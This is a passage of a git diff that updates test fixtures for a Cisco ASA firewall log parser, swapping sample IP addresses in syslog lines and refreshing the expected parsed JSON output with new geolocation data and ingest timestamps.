"Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", @@ -69,12 +69,12 @@ "level": "informational" }, "destination": { - "address": "192.0.2.15", - "ip": "192.0.2.15" + "address": "192.168.2.15", + "ip": "192.168.2.15" }, "source": { - "address": "192.0.2.134", - "ip": "192.0.2.134" + "address": "192.168.2.134", + "ip": "192.168.2.134" }, "tags": [ "preserve_original_event" @@ -98,8 +98,8 @@ "MYHOSTNAME" ], "ip": [ - "192.0.2.134", - "192.0.2.15" + "192.168.2.134", + "192.168.2.15" ] }, "host": { @@ -107,8 +107,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:37.810238700Z", - "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0", + "ingested": "2021-12-09T13:34:15.786616300Z", + "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", "action": "flow-expiration", @@ -122,7 +122,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "192.0.2.134", + "mapped_source_ip": "192.168.2.134", "icmp_type": 8, "icmp_code": 0 } diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log index 2742be4b533..ca647162cfc 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log @@ -1,3 +1,3 @@ -<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json index fa8747c5677..898640c4657 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json @@ -5,9 +5,27 @@ "level": "notification" }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 53, - "address": "203.0.113.42", - "ip": "203.0.113.42" + "ip": "81.2.69.144" }, "syslog": { "facility": { @@ -16,8 +34,8 @@ }, "source": { "port": 27218, - "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244", - "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244", + "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" }, "tags": [ "preserve_original_event" @@ -47,16 +65,16 @@ }, "related": { "hosts": [ - "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" ], "ip": [ - "203.0.113.42" + "81.2.69.144" ] }, "event": { "severity": 5, - "ingested": "2021-10-06T20:55:38.065426900Z", - "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:34:15.994818500Z", + "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -120,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:38.065435Z", + "ingested": "2021-12-09T13:34:15.994826400Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -202,7 +220,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:38.065438800Z", + "ingested": "2021-12-09T13:34:15.994831900Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log index 73ea89341b0..5dc7589b754 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log @@ -1,72 +1,72 @@ -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query -Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 : %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80) -Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 : %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 : %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 : %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 : %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 : %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 : %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic -Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside -Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username) +Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), 